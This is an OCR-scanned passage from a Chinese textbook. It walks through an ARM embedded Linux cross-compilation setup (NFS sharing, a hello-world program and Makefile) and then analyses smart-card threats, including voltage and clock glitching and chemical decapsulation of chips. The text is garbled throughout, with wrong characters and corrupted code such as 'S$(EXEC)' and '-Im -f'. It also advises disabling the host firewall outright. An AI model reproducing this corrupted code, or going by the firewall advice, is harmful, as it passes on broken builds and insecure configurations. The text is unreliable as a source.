根据 自己 的 具体 电路 进行 源 代 码 修改 。 这 是 让 系统 可 以 正常 运行 的 第 一 步 。 如 果 你 购买 
了 厂家 的 仿真 器 当然 比较 容易 烧 写 flash 了 ， 但 是 其 中 的 核心 技术 是 无 法 了 解 的 。 这 对 
于 需要 迅速 开发 自己 的 应 用 的 人 来 说 可 以 极 大 提高 开发 速度 。 
8.3.1.1 许 入 式 的 交 又 编译 环境 配置 方法 

绝 大 多 数 的 Linux 软件 开发 都 是 以 native 方式 进行 的 ， 即 本 机 HOST) 开发 、 调 
试 ， 本 机 运行 的 方式 。 这 种 方式 通常 不 适合 于 嵌入 式 系统 的 软件 开发 ， 因 为 对 于 嵌入 式 
系统 的 开发 ， 没 有 足够 的 资源 在 本 机 “〔〈 即 板子 上 系统 ) 运行 开发 工具 和 调试 工具 。 通 常 
的 嵌入 式 系 统 的 软件 开发 采用 一 种 交叉 编译 调试 的 方式 。 交 叉 编译 调试 环境 建立 在 宿主 
BL CAI PC HL) 上 ， 对 应 的 开发 板 叫 作 目标 板 。 

运行 Linux 的 PC 宿主 机 开发 时 使 用 宿主 机 上 的 交叉 编译 、 汇 编 及 连接 工具 形成 可 
执行 的 三 进 制 代码 ，( 这 种 可 执行 代码 并 不 能 在 宿主 机 上 执行 , 而 只 能 在 目标 板 上 执行 )， 
然后 把 可 执行 文件 下 载 到 目标 机 上 运行 。 调 试 时 的 方法 很 多 ， 可 以 使 用 串口 ， 以 太 网 
等 ， 具 体 使 用 哪 种 调试 方法 可 以 根据 目标 机 处 理 器 所 提供 的 支持 作出 选择 。 宿 主机 和 目 
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标 板 的 处 理 器 一 般 都 不 相同 , 宿主 机 为 INTEL 处 理 器 , 而 目标 板 为 三 星 S3c2410, GNU 
编译 器 提供 这 样 的 功能 ， 在 编译 器 编译 时 可 以 选择 开发 所 需 的 宿主 机 和 目标 机 从 而 建立 
开发 环境 。 所 以 在 进行 嵌入 式 开 发 前 第 一 步 的 工作 就 是 要 安装 一 台 装 有 指定 操作 系统 的 
PC 机 作 宿 主 开发 机 ， 对 于 嵌入 式 Linux， 宿 主机 上 的 操作 系统 一 般 要 求 为 Redhat 
Linux。 风 入 式 开发 通常 要 求 宿主 机 配置 有 网 络 , 支持 NFS( 为 交叉 开发 时 mount 所 用 )。 
然后 要 在 宿主 机 上 建立 交叉 编译 调试 的 开发 环境 。 

在 一 台 PC 上 安装 RedHat LINUX9.0, 选择 Custom 定制 安装 ， 在 选择 软件 
Package 时 最 好 将 所 有 包 都 安装 ， 需 要 空间 约 2.7GB， 如 果 选 择 最 后 一 项 : everything， 
即 完全 安装 ， 将 在 安装 完 RedHat 后 还 要 安装 Linux 的 编译 器 和 开发 库 以 及 
ARMLinux 的 所 有 源 代码 。 

配置 网 络 ， 包 括 配置 IP 地 址 、NFS 服务 、 防 火 墙 。 网 络 配置 主要 是 要 安装 好 以 太 
网 卡 ， 然 后 配置 宿主 机 IP 为 192.168.0.121。 如 果 是 在 有 多 台 计 算 机 使 用 的 局 域 网 环境 
使 用 此 开发 设备 ，IP 地 址 可 以 根据 具体 情况 设置 。 

双击 设备 eth0 的 蓝 色 区 域 ,进入 以 太 网 设置 界面 , 设置 IP 地址 .对 于 REDHAT9.0， 
它 默认 的 是 打开 了 防火 墙 ， 因 此 对 于 外 来 的 IP 访问 它 全 部 拒绝 ， 这 样 其 他 网 络 设备 根 
本 无 法 访问 它 ， 即 无 法 用 NFS mount 它 ， 许 多 网 络 功能 都 将 无 法 使 用 。 因 此 网 络 安装 
完毕 后 ， 应 立即 关闭 防火 墙 。 

单 击 主 菜单 运行 系统 设置 一 服务 器 设置 一 NFS 服务 器 (英文 为 : SETUP 一 SYSTEM 
SERVICE 一 NFS) ， 单 击 增 加 出 现 如 下 在 界面 ， 在 目录 (Drictory): 中 填 入 需要 共享 的 路 
径 ， 在 主机 (Hosts): 填 入 允许 进行 连接 的 主机 IP 地 址 。 并 选择 允许 客户 对 共享 目录 的 
操作 为 只 读 (Read 一 only) 或 读 写 Read/write)。 

我 们 也 可 以 手工 编写 /etc/exports 文件 ， 其 格式 如 下 : 

共享 目录 可 以 连接 的 主机 《〈 读 写 权 限 ， 其 他 参数 ) 例如 : 

/arm2410s 192.168.0.*(rw,sync) 

表示 将 本 机 的 /arm2410s 目录 共享 给 IP 地 址 为 192.168.0.1 一 192.168.0.254 的 所 
有 计算 机 ， 可 以 读 取 和 写 入 。 

配置 完成 后 ， 可 用 如 下 办 法 简单 测试 一 下 NFS 是 否 配 置 好 了 : 在 宿主 机 上 自己 
mount 自己 ， 看 是 否 成 功 就 可 以 判断 NFS 是 否 配 好 了 。 例 如 在 宿主 机 /目录 下 执行 : 

mount 192.168.0.10: /arm2410s /mnt 

其 中 192.168.0.10 应 修改 为 你 自己 主机 的 IP 地 址 。 然后 到 /mnt/ 目 录 下 看 是 否 可 以 
列 出 /arm2410s 目录 下 的 所 有 文件 和 目录 ， 可 以 则 说 明 : 

mount 成 功 ，NFS 配置 成 功 。 至 此 ， 就 可 以 进行 下 一 步 的 工作 了 。 
8.3.1.2 RAR C 语言 的 编程 方法 和 编译 方法 

在 上 述 交 义 编译 环境 中 ， 需 进行 如 下 的 工作 : 
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(1) 建立 工作 目录 

[root@zxt smile]# mkdir hello 

[root@zxt smile]# cd hello 

(2) 编写 程序 源 代码 

在 Linux 下 的 文本 编辑 器 有 许多 , 常用 的 是 vim 和 Xwindow 界面 下 的 gedit 等 ， 
我 们 在 开发 过 程 中 推荐 使 用 vim， 用 户 需要 学 习 vim 的 操作 方法 ， 请 参考 相关 书籍 中 
的 关于 vim 的 操作 指南 。Kdevelope、anjuta 软件 的 界面 与 vc6.0 类 似 ， 使 用 它们 对 于 
熟悉 Windows 环境 下 开发 的 用 户 更 容易 上 手 。 

实际 的 hello.c 源 代码 较 简 单 ， 如 下 : 


#include <stdio.h> 

main () 

{ 

printf (“hello world \n”); 


} 

我 们 可 以 是 用 下 面 的 命令 来 编写 hello.c 的 源 代码 ,进入 hello 目录 使 用 vi 命令 来 
编辑 代码 ; 

[root@zxt hello]# vi hello.c 


按 “i” 或 者 “a” 进 入 编辑 模式 ， 将 上 面 的 代码 录入 进去 ， 完 成 后 按 Esc 键 进 入 命 
令 状态 , 再 用 命令 “: wq ”保存 并 退出 。 这 样 我 们 便 在 当前 目录 下 建立 了 一 个 名 为 hello.c 
的 文件 。 

(3) 编写 Makefile 

要 使 上 面 的 hello.c 程序 能 够 运行 ， 我 们 必须 要 编写 一 个 Makefile 文件 ，Makefile 
文件 定义 了 一 系列 的 规则 ， 它 指明 了 哪些 文件 需要 编译 ， 哪 些 文件 需要 先 编译 ， 哪 些 文 
件 需要 重新 编译 等 等 更 为 复杂 的 命令 。 使 用 它 带 来 的 好 处 就 是 自动 编译 ， 你 只 需要 逆 一 
个 “make” 命 令 整 个 工程 就 可 以 实现 自动 编译 ， 当 然 我 们 本 次 实验 只 有 一 个 文件 ， 它 还 
不 能 体现 出 使 用 Makefile 的 优越 性 ， 但 当 工程 比较 大 文件 比较 多 时 ， 不 使 用 Makefile 
几乎 是 不 可 能 的 。 

下 面 我 们 介绍 本 次 实验 用 到 的 Makefile 文件 。 

CC= armv4l-unknown-linux-gcc 

EXEC = hello OBJS = hello.o CFLAGS += LDFLAGS+= -static 

all: S$(EXEC) 

$(EXEC): $(OBJS) 

$(CC) $(LDFLAGS) -o $@ $(OBJS) 

clean: 

-Im -f $(EXEC) *.elf *.gdb *.0 
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下 面 我 们 来 简单 介绍 这 个 Makefile 文件 的 儿 个 主要 部 分 : 

CC 指明 编译 器 

EXEC 表示 编译 后 生成 的 执行 文件 名 称 

OBIS 目标 文件 列表 

CFLAGS 编译 参数 

LDFLAGS 连接 参数 

all: 编译 主 入 口 

clean: 清除 编译 结果 

YER: “$(CC) $(LDFLAGS) -o $@ $(OBJS)” 和 “-rm -f $(EXEC) *.elf *.gdb *.o” 前 
空白 由 一 个 Tab 制 表 符 生成 ， 不 能 单纯 由 空格 来 代替 。 

与 上 面 编 写 hello.c 的 过 程 类 似 ， 用 vi 来 创建 一 个 Makefile 文件 并 将 代码 录入 
其 中 

[root@zxt hello]# vi Makefile 

(4) 编译 应 用 程序 

在 上 面 的 步骤 完成 后 ， 我 们 就 可 以 在 hello 目录 下 运行 “make” 来 编译 我 们 的 程序 
了 。 如 果 进 行 了 修改 ， 重 新 编译 则 运行 : 

[root@zxt hello]# make clean 

[root@zxt hello}]# make 

注意 ; 编译 、 修 改 程序 都 是 在 宿主 机 (本 地 PC 机 ) 上 进行 ， 不 能 在 MINICOM 
的 终端 方式 下 进行 。 

(5) 下 载 调试 

在 宿主 PC 计算 机 上 启动 NFS 服务 ， 并 设置 好 共享 的 目录 ， 在 建立 好 NFS 共享 
目录 以 后 ， 我 们 就 可 以 进入 MINICOM 中 建立 开发 板 与 宿主 PC 机 之 间 的 通信 了 。 

[root@zxt hello]# minicom 

[/mnt/yaffs] mount -t nfs -o nolock 192.168.0.56: /arm2410s /host 

注意 : IP 地 址 需要 根据 宿主 PC 机 的 实际 情况 修改 。 

成 功 挂 接 宿主 机 的 am2410s 目录 后 ， 在 开发 板 上 进入 /host 目录 便 相应 进入 宿主 
机 的 /arm2410s 目录 ， 我 们 已 经 给 出 了 编辑 好 的 hello.c 和 Makefile 文件 ， 它 们 在 
/arm2410s/exp/basic/01_hello 目录 下 。 用 户 可 以 直接 在 宿主 PC 上 编译 生成 可 执行 文件 ， 
并 通过 上 面 的 命令 挂 载 到 开发 板 上 ， 运 行程 序 察看 结果 。 

如 果 不 想 使 用 我 们 提供 的 源码 的 话 ， 可 以 再 建立 一 个 NFS 共享 文件 夹 。 如 
Aootshare ， 我 们 把 我 们 自己 编译 生成 的 可 执行 文件 复制 到 该 文件 夹 下 ， 并 通过 
MINICOM 挂 载 到 开发 板 上 。 
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[root@zxt hello]# cp hello /root/share 

[root@zxt hello}# minicom 

[/mnt/yaffs] mount -t nfs -o nolock 192.168.0.56: /root/share /host 

再 进入 /host 目录 运行 刚刚 编译 好 的 hello 程序 ， 查 看 运行 结果 。 

[Amntyaffs] cd /host 

[/host] .hello hello world 

注意 : 开发 板 挂 接 宿 主 计 算 机 目录 只 需要 挂 接 一 次 便 可 ， 只 要 开发 板 没有 重启 ， 就 
可 以 一 直 保 持 连 接 。 这 样 可 以 反复 修改 、 编 译 、 调 试 ， 不 需要 下 载 到 开发 板 。 

83.13 IC 卡 的 安全 配置 和 应 用 

1. IC 卡 基础 知识 

IC 卡 是 超大 规模 集成 电路 、 计 算 机 技术 及 信息 安全 技术 发 展 的 产物 ， 将 微 电 子 技术 
和 计算 机 技术 结合 在 一 起 ， 提 高 了 人 们 生活 和 工作 的 现代 化 程度 。 

IC 卡 是 1970 年 发 明 的 ， 并 将 这 项 技术 应 用 到 金融 、 交 通 、 医 疗 、 身 份 证 明 等 多 个 
行业 ，“IC 卡 ” 和 “磁卡 ”都 是 从 技术 角度 起 的 名 字 ， 不 能 将 其 和 “信用 卡 ”、“ 电 话 
卡 ” 等 从 应 用 角度 命名 的 卡 相 混淆 。 

IC 卡 的 开发 、 研 制 与 应 用 是 一 项 系统 工程 ， 涉 及 到 计算 机 、 通 信 、 网 络 、 软 件 、 卡 
的 读 写 设备 、 应 用 机 具 等 多 种 产品 领域 的 多 种 技术 学 科 。 因 此 ， 全 球 IC 卡 产 业 在 技术 、 
市 场 及 应 用 的 竞争 中 迅速 发 展 起 来 。IC 卡 已 是 当今 国际 电子 信息 产业 的 热点 产品 之 一 ， 
除了 在 商业 、 医 疗 、 保 险 、 交 通 、 能 源 、 通 信 、 安 全 管理 、 身 份 识 别 等 非 金融 领域 得 到 
广泛 应 用 外 ， 在 金融 领域 的 应 用 也 日 益 广 泛 ， 影 响 十 分 深远 。 

IC 卡 的 外 形 与 磁卡 相似 ， 它 与 磁卡 的 区 别 在 于 数据 存储 的 媒体 不 同 。 磁 卡 是 通过 卡 
上 磁 条 的 磁场 变化 来 存储 信息 的 ,而 IC 卡 是 通过 嵌入 卡 中 的 电 擦 除 式 可 编程 只 读 存储 器 
集成 电路 芯片 来 存储 数据 信息 的 。 因 此 ， 与 磁卡 相 比 较 ，IC 卡 具有 明显 优点 。 

IC 卡 的 标准 有 ISO 7816 和 ISO 14443。 分 类 按 通 信 方 式 : 

。 接触 式 IC F 

。 非 接触 式 IC F 

。 双 界 面 IC F 

按 芯 片 类 型 分 为 : 存储 器 卡 (memory) ， 早 期 IC 卡 产 品 ， 单 纯 的 存储 数据 ， 没 有 
安全 保护 机 制 ， 没 有 数据 的 组 织 管理 ， 通 常 存储 量 也 很 小 。 逻 辑 加 密 存 储 卡 logic 
memory) ， 相 对 安全 的 存储 卡 ， 有 固定 的 存储 区 划分 管理 ， 有 简单 的 密 钥 访问 保护 ， 可 
存储 一 定量 的 数据 。 而 真正 的 智能 卡 有 智能 CPU， 依 靠 COS (card operation system) 管 
理 IC 卡 , 可 以 灵活 设计 文件 结构 管理 数据 , 复杂 可 配置 的 安全 控制 模式 ,可 储存 比较 多 
的 数据 ， 实 现 复 杂 的 功能 。 

2. IC 卡 的 安全 

智能 卡 是 在 20 世纪 70 年 代 出 现 的 ， 它 最 先 被 应 用 于 金融 系统 。 随 着 技术 的 发 展 ， 
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目前 已 被 广泛 用 在 访问 控制 、 电 子 商务 、 认 证 、 签 章 等 各 种 应 用 中 。 本 质 上 它 是 一 种 带 
CPU 且 其 存储 器 不 与 外 界 相 联 系 的 设备 。 

虽然 智能 卡号 称 是 一 种 “安全 ”的 设备 ， 但 随 着 技术 的 进步 ， 其 安全 性 正 日 益 受到 
质疑 。 对 于 大 多 数 应 用 来 说 ， 它 并 不 是 一 个 “可 信 ” 的 计算 平台 ， 而 仅仅 是 具有 有 限 计 
算 能 力 的 数据 存储 设备 。 我 们 首先 对 智能 卡 的 使 用 环境 按照 功能 进行 分 类 ， 在 此 基础 上 
讨论 其 各 部 分 的 关系 ， 并 分 析 其 安全 性 。 

(1) 智能 卡 系统 功能 要 素 

为 了 更 好 地 理解 智能 卡 面临 的 威胁 ， 应 将 其 不 同 的 功能 部 分 分 离 ， 建 立 智能 卡 的 操 
作 环 境 ， 从 而 可 以 分 析 各 个 部 分 对 安全 性 的 影响 。 必 须 注意 的 是 ， 分 离 的 部 分 越 多 ， 就 
越 会 增加 攻击 的 可 能 性 。 如 果 卡 的 拥有 者 不 能 控制 卡 上 存储 的 数据 ， 将 会 导致 卡 的 占有 
者 (不 管 合法 还 是 非法 ) 对 卡 里 数据 的 攻击 。 再 比如 持 卡 人 可 能 不 能 控制 卡 里 的 运行 的 软 
件 ， 在 多 应 用 情况 下 ， 卡 发 行 机 构 也 可 能 不 能 对 卡 里 的 软件 进行 控制 。 而 卡 数据 的 拥有 
者 也 可 能 不 是 持 卡 人 ， 持 有 数据 的 人 可 能 要 求 持 卡 人 不 能 对 卡 里 的 数据 作 任何 改动 等 。 
因此 要 建立 的 系统 模型 包括 5 一 6 个 部 分 。 每 个 可 能 的 部 分 都 会 导致 新 的 攻击 , 这 些 分 离 
的 部 分 又 会 给 攻击 者 带 来 攻击 机 会 。 

(2) 智能 卡 系统 模型 

在 一 个 基于 智能 卡 的 系统 中 可 能 存在 很 多 潜在 的 功能 要 素 。 通 常会 有 5 一 6 个 ， 包 
括 持 卡 人 、 终 端 、 数 据 持 有 者 、 发 卡 方 、 卡 生产 者 以 及 卡 软件 开发 方 。 

O 持 卡 人 : 智能 卡 的 拥有 者 ， 真 正 使 用 它 的 用 户 。 通 过 应 用 系统 ， 他 可 以 控制 卡 
里 的 数据 。 但 是 很 明显 ， 他 不 能 对 卡 里 的 应 用 软件 、 协 议 或 硬件 进行 控制 。 

@ 数据 持 有 者 : 卡 里 数据 的 拥有 者 。 比 如 用 在 机 构 中 进行 数字 签名 的 卡 ， 其 持 卡 
人 也 就 是 数据 的 拥有 者 。 如 果 是 电子 现金 卡 ， 现 金 的 发 行 机 构 才 是 卡 的 数据 拥有 者 。 

© 终端 : 一 般 是 连接 智能 卡 的 计算 机 ， 是 卡 同 外 界 的 交互 界面 。 终 端 控 制 着 所 有 
进出 卡 的 输入 输出 。 

© 卡 发 行商 : 发 行 智能 卡 的 单位 。 它 控制 着 卡 里 运行 的 应 用 系统 以 及 卡 初始 化 时 
的 初 装 参数 。 发 行商 可 以 控制 应 用 系统 ， 也 可 以 与 系统 分 离 。 在 一 些 多 应 用 中 ， 卡 发 行 
机 构 与 卡 里 应 用 无 关 ， 仅 仅 是 控制 卡 操 作 系统 。 而 另 一 些 多 应 用 中 ， 发 行商 则 控制 所 有 
的 应 用 。 从 安全 分 析 的 角度 出 发 ， 一 般 可 以 将 卡 发 行商 、 生 产 商 以 及 软件 生产 商 看 成 一 
个 整体 ， 但 事实 上 ， 它 们 是 分 开 的 。 

© 卡 生产 商 : 生产 智能 卡 的 单位 。 这 里 进行 了 简化 ， 主 要 指 卡 硬件 芯片 的 生产 。 
因为 有 可 能 生产 智能 卡 的 单位 不 一 定 是 卡 芯片 的 生产 者 ， 它 也 许 只 是 装配 而 已 ， 也 可 能 
是 转 包 商 等 。 这 里 将 它们 看 成 一 个 部 分 。 

© 软件 生产 商 : 智能 卡 中 软件 的 开发 单位 。 同 样 道理 ， 这 里 也 将 不 同 的 软件 开发 
看 成 了 同一 个 部 分 ， 比 如 有 开发 操作 系统 的 ， 也 有 开发 具体 应 用 程序 的 。 

(3) 模型 安全 性 分 析 
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一 般 可 以 将 攻击 分 为 两 大 类 型 。 一 种 是 逻辑 攻击 , 涉及 到 系统 各 部 分 之 间 的 相关 性 。 
例如 持 卡 人 可 以 对 终端 进行 欺骗 ， 卡 发 行 机 构 也 可 能 欺骗 持 卡 人 。 另 一 种 是 物理 攻击 ， 
着 重 于 对 卡 本 身 利用 各 种 技术 手段 的 攻击 。 针 对 卡 系统 的 各 个 功能 要 素 ， 可 以 将 攻击 分 
为 多 种 形式 。 

O 终端 对 持 卡 人 或 数据 拥有 者 的 攻击 

当 持 卡 人 将 卡 插入 终端 机 时 ， 他 是 信任 这 台 终 端的 ， 认 为 他 们 之 间 的 所 有 交互 是 合 
法 并 且 准 确 的 。 一 张 储 值 卡 在 进行 减 一 操作 时 ， 它 要 求 终 端 发 出 一 条 “ 减 一 ”的 命令 到 
卡 上 ， 此 时 ， 它 相信 终端 不 是 发 出 的 “ 减 十 ”操作 。 在 这 种 环境 下 如 果 终 端 进行 欺诈 则 
持 卡 人 很 难 察觉 。 比 如 伪装 的 ATM 柜员 机 就 会 产生 这 种 欺骗 攻击 。 

相应 的 防范 措施 是 限制 每 次 操作 的 时 间 ， 以 及 限制 每 次 操作 的 数额 。 例 如 在 储 值 卡 
的 操作 中 ， 只 允许 终端 每 分 钟 进行 一 次 操作 ， 同 时 也 规定 操作 的 最 大 数额 。 在 实际 的 金 
融 系 统 中 ， 操 作 都 是 通过 网 络 由 后 台 来 完成 ， 同 时 可 以 监控 每 一 个 可 疑 的 行为 。 因 此 这 
种 措施 只 是 针对 终端 直接 进行 远程 处 理 的 情况 。 

@ 终端 对 发 行商 的 攻击 

在 终端 和 发 行商 属于 不 同 功能 部 分 的 系统 中 ， 会 产生 几 种 新 的 攻击 情况 。 由 于 终端 
控制 着 卡 和 发 行 机 构 之 间 所 有 的 通信 (通常 是 要 利用 后 台 操作 的 系统 )。 因 此 终端 可 以 伪 
造 与 交易 无 关 的 记录 ， 甚 至 拒绝 交易 的 执行 。 终 端 也 能 够 阻 断 交易 执行 的 步骤 来 造成 发 
行商 对 用 户 提供 服务 的 困难 。 这 些 攻 击 意 在 终端 和 发 行商 之 间 的 通信 上 做 文章 ， 由 此 防 
范 它 可 以 在 连接 上 增加 安全 性 。 比 如 采用 卡 里 的 线路 认证 技术 ， 也 可 以 在 后 台 进 行 监 

@ 终端 对 卡 生 产 商 或 卡 系统 软件 的 攻击 

由 于 终端 是 卡 与 外 界 唯一 的 接口 。 因 此 ， 利 用 终端 设备 可 以 对 卡 生 产 商 或 卡 里 的 系 
统 软件 进行 攻击 。 也 就 是 对 卡 里 的 硬件 或 软件 的 攻击 。 通 常 采 用 物理 攻击 手段 ， 通 常 采 
用 伪造 终端 或 用 工具 来 替代 终端 ， 读 出 或 测试 出 卡 里 的 数据 ， 然 后 进行 程序 的 蔡 换 或 对 
密 钥 的 恢复 来 达到 攻击 的 目的 。 因 此 其 安全 性 也 是 基于 卡 的 物理 特性 上 ， 要 从 硬件 的 物 
理 保 护 和 系统 软件 的 安全 功能 完善 上 入 手 。 

© 持 卡 人 对 终端 的 攻击 

伪造 的 卡 或 被 算 改 的 卡 就 会 发 生 这 种 情况 。 可 以 涉及 到 对 协议 、 数 据 、 程 序 的 攻击 。 
一 个 完善 的 通信 协议 可 以 有 效 地 减轻 这 种 攻击 的 危害 。 而 卡 本 身 的 防 物理 侵入 的 特性 也 
会 使 这 种 攻击 变 得 困难 ， 因 为 物理 特性 使 其 软件 上 的 改动 相应 变 得 困难 。 一 般 来 说 ， 伪 
造 的 卡 是 无 法 伪造 数字 签名 的 ， 因 为 纯 软 件 是 很 难 达到 硬件 签名 的 效果 。 同 时 ， 伪 造 的 
卡 也 很 难 通过 终端 的 双向 认证 。 而 从 系统 模型 上 来 讲 ， 需 要 从 功能 上 将 持 卡 人 和 卡 数据 
拥有 者 分 离 。 

© 持 卡 人 对 数据 拥有 者 的 攻击 

在 大 多 数 基 于 商业 应 用 的 智能 卡 系统 中 ， 卡 里 的 数据 是 对 持 卡 人 不 可 见 的 。 比 如 权 
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限 访问 卡 ， 卡 里 数据 是 不 能 让 持 卡 人 知道 的 ， 和 否则， 他 可 以 伪造 更 多 的 访问 卡 。 在 电子 
商务 应 用 中 ， 卡 里 的 密 钥 也 是 不 能 让 用 户 知道 的 ， 否 则 ， 他 可 能 会 进行 交易 欺诈 。 在 另 
一 些 情况 下 ， 也 是 可 以 知道 的 ， 但 不 能 允许 持 卡 人 改动 卡 里 的 数据 。 比 如 储 值 卡 ， 用 户 
应 该 知道 卡 的 余额 , 不 能 随意 改动 这 个 余额 。 这 种 攻击 的 特点 是 攻击 者 就 是 卡 的 持 有 者 ， 
因此 可 以 随心 所 欲 地 支配 对 卡 的 攻击 ， 甚 至 可 以 将 卡 毁 坏 来 达到 穷 取 里 面 数据 的 目的 。 

@ 持 卡 人 对 发 行商 的 攻击 

很 多 金融 攻击 的 例子 均 是 针对 卡 发 行商 的 。 但 实质 上 ， 是 对 卡 里 数据 或 程序 的 真实 
性 和 完整 性 的 攻击 ， 因 此 可 以 看 成 是 对 数据 的 攻击 ， 目 的 是 在 于 对 发 行商 造成 破坏 。 以 
付费 电话 的 应 用 为 例 ， 如 果 系 统 是 基于 账户 的 ， 显 然 可 以 针对 这 个 账户 号 码 进行 攻击 。 
通常 这 类 系统 是 通过 卡 里 的 随机 数 和 哈 希 函数 的 连接 来 防止 攻击 。 同 时 ， 卡 发 行商 也 可 
以 在 卡 里 加 入 “认证 ”位 来 防止 攻击 ， 这 些 位 可 以 是 一 个 “认证 ”过 的 账户 数字 ， 也 可 
以 是 一 个 密 钥 等 。 

@ 持 卡 人 对 软件 生产 者 的 攻击 

通常 ， 卡 发 行 出 来 后 里 面 是 没有 任何 应 用 程序 的 ， 这 种 将 程序 和 卡 分 离 是 基于 假定 
卡片 拥有 者 和 软件 拥有 者 之 间 是 不 会 相互 攻击 的 前 提 。 然 而 攻击 者 也 会 试图 侵入 卡 里 的 
程序 ， 甚 至 是 用 一 些 功能 强大 的 硬件 工具 。 这 同上 面 所 说 的 利用 终端 的 情况 一 致 ， 只 是 
考虑 的 出 发 点 不 一 样 。 

发 行商 对 持 卡 人 的 攻击 

通常 情况 下 ， 发 行 卡 的 机 构 掌握 着 大 量 持 卡 人 的 私人 信息 ， 因 此 一 旦 发 卡 方 怀 有 恶 
意 的 话 ， 持 卡 人 将 完全 暴露 在 他 的 攻击 之 下 了 。 如 果 发 卡 方 同时 也 是 系统 软件 或 硬件 的 
开发 方 的 话 ， 那 么 软件 设计 人 员 可 以 很 轻易 地 获取 持 卡 人 的 信息 。 由 此 可 见 ， 在 卡 系统 
的 设计 时 也 要 考虑 用 户 信息 的 保密 性 和 完整 性 。 

© 发 行商 对 终端 的 攻击 

发 行商 一 般 是 处 在 后 台 ， 从 功能 上 应 该 是 和 终端 分 离 的 。 也 即 操作 发 生 在 远程 终端 
或 靠近 用 户 端的 地 方 。 这 样 ， 发 行 方 一 端 所 取 的 数据 是 终端 处 理 完成 后 发 送 过 来 的 。 对 
终端 的 欺骗 一 般 发 生 在 发 行商 对 数据 的 进一步 处 理 上 ， 有 可 能 对 数据 进行 算 改 ， 这 样 就 
会 直接 对 持 卡 人 产生 影响 ， 因 为 终端 的 操作 结果 是 已 经 记录 在 卡 中 的 。 这 种 情况 在 实际 
中 是 很 少 发 生 的 ， 但 对 于 系统 设计 的 人 来 说 是 要 考虑 的 。 

@ 多 应 用 隔离 

卡 生产 方 对 数据 拥有 者 的 攻击 很 明显 ， 制 造 卡 的 机 构 ( 包 括 软件 和 硬件 ) 对 卡 里 的 数 
据 起 着 决定 性 的 影响 。 一 个 多 用 户 的 安全 计算 机 系统 ， 设 计 保 护 每 个 用 户 进程 的 安全 内 
核 就 是 一 个 难题 。 因 此 假定 存在 一 个 可 允许 多 用 户 的 应 用 程序 在 同一 个 卡 上 执行 而 又 互 
不 影响 的 卡 操作 系统 (采用 硬件 隔离 )， 可 以 解决 多 应 用 的 安全 隔离 ，Java 也 支持 多 应 用 ， 
但 安全 性 并 不 明显 。 

(4) 外 部 物理 攻 
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物理 攻击 主要 是 来 自 外 部 ， 针 对 智能 卡 系统 硬件 设施 。 这 里 主要 讨论 针对 智能 卡 本 
身 硬件 资源 ， 比 如 CPU, ROM, RAM 等 。 就 其 广泛 采用 的 EEPROM 来 说 ， 有 这 样 的 
一 个 问题 ， 擦 除 一 个 内 存单 元 的 门 电路 所 存储 的 电荷 需要 相对 高 的 电压 ， 因 此 ， 如 果 攻 
击 者 这 样 做 ， 就 很 容易 破坏 里 面 的 数据 。 而 且 显 微 镜 、 激 光 、 超 声波 或 等 离子 束 均 可 以 
在 不 破坏 EEPROM 的 情况 下 得 到 电容 或 二 极 管 里 的 内 容 。 下 面 讨 论 针 对 芯片 及 处 理 器 
一 层 的 物理 攻击 ， 同 时 提出 一 些 相应 的 办 法 。 

O 非 侵入 式 攻 击 。 非 常规 的 电压 或 温度 都 能 对 EEPROM 的 操作 带 来 影响 。 一 个 极 
低 的 电压 就 可 能 会 导致 安全 数据 的 泄露 。 极 低 的 电压 也 会 暴露 其 他 一 些 弱 点 : 比如 卡片 
上 通常 会 带 一 个 模拟 随机 数 发 生 器 ， 用 来 产生 加 密 用 密 钥 ， 但 在 极 低 或 微弱 的 电压 下 ， 
就 会 产生 出 几乎 全 “1” 的 输出 ， 这 显然 是 不 安全 的 。 因 此 ， 一些 安全 处 理 器 利用 专门 的 
传感器 来 侦 测 电流 或 电压 ， 一 旦 超出 范围 就 会 复位 。 同 时 在 一 些 智 能 卡 处 理 器 中 增加 了 
监控 电路 来 防止 时 钟 频率 过 低 时 的 单 步 攻 击 ， 但 监控 电路 不 能 对 瞬时 波形 干扰 进行 有 效 
的 反应 。 电 源 或 时 钟 的 瞬时 效应 可 以 影响 处 理 器 指令 解码 甚至 单条 指令 的 执行 上 。 因 此 
如 果 利 用 这 种 超 短 的 时 钟 或 电源 的 脉冲 波形 , 就 可 以 使 CPU 发 生 指令 执行 时 的 错误 。 尽 
管 不 能 知道 具体 哪 一 个 瞬时 跳 变 会 造成 哪个 指令 的 执行 ， 但 它 提供 了 一 种 简单 的 系统 搜 
索 的 攻击 方案 。 寻 找 正确 的 瞬时 跳 变 意味 着 对 指令 的 重复 操作 。 当 每 一 次 测试 复位 时 ， 
所 有 发 送 到 卡 的 信号 会 在 非常 精确 的 时 间 到 达 。 将 每 一 个 时 钟 周 期 进行 多 次 瞬时 跳 变 测 
试 , 直到 其 中 的 一 个 导致 传送 了 一 个 字 节 到 串口 , 重复 它 就 可 以 导致 对 内 存 的 循环 操作 。 
由 此 ， 攻 击 者 可 以 从 中 找到 卡 里 的 秘密 数据 如 密 钥 等 。 并 不 仅仅 对 输出 循环 的 瞬时 脉冲 
攻击 ， 另 外 对 单条 指令 ， 比 如 口令 操作 、 权 限 或 协议 的 控制 就 会 瓦解 整个 卡 的 安全 防线 。 

@ 物理 攻击 。 基 本 上 有 两 种 方式 : 利用 电容 探测 芯片 表面 钝 化 层 ， 另 一 种 就 是 光 
学 探头 探测 芯片 。 一 般 ， 典 型 的 芯片 封装 在 一 个 大 约 Lem? 的 塑胶 镀层 上 ， 四 周 均 有 导电 
的 接触 区 域 ， 它 的 一 面 是 可 见 的 卡 与 读 卡 器 的 接触 区 ， 硅 掩 膜 是 固化 在 另 一 面 ， 并 且 采 
用 金 和 铝 连 线 。 塑 胶 镀 层 是 被 一 层 环 氧 树脂 覆盖 。 最 终 的 芯片 按 ISO 标准 封装 在 卡片 上 。 
刮 掉 卡 片 塑胶 可 以 露出 环 氧 树脂 层 ,通过 一 些 化 学 处 理 就 可 以 将 表面 的 环 氧 树脂 溶解 掉 ， 
直到 露出 硅 掩 膜 的 表面 ， 如 果 处 理 得 好 ， 没 有 破坏 表面 的 走 线 ， 其 功能 则 仍然 有 效 。 大 
多 数 芯片 都 有 一 个 氧化 硅 或 氮 化 硅 的 钝 化 层 用 来 保护 它 免 受 外 界 环 境 的 影响 。 芯 片 测试 
人 员 一 般 是 采用 氧 氛 化 物 的 蚀刻 技术 来 剥 去 钝 化 层 ， 这 对 一 般 业 余 的 攻击 者 而 言 是 不 容 
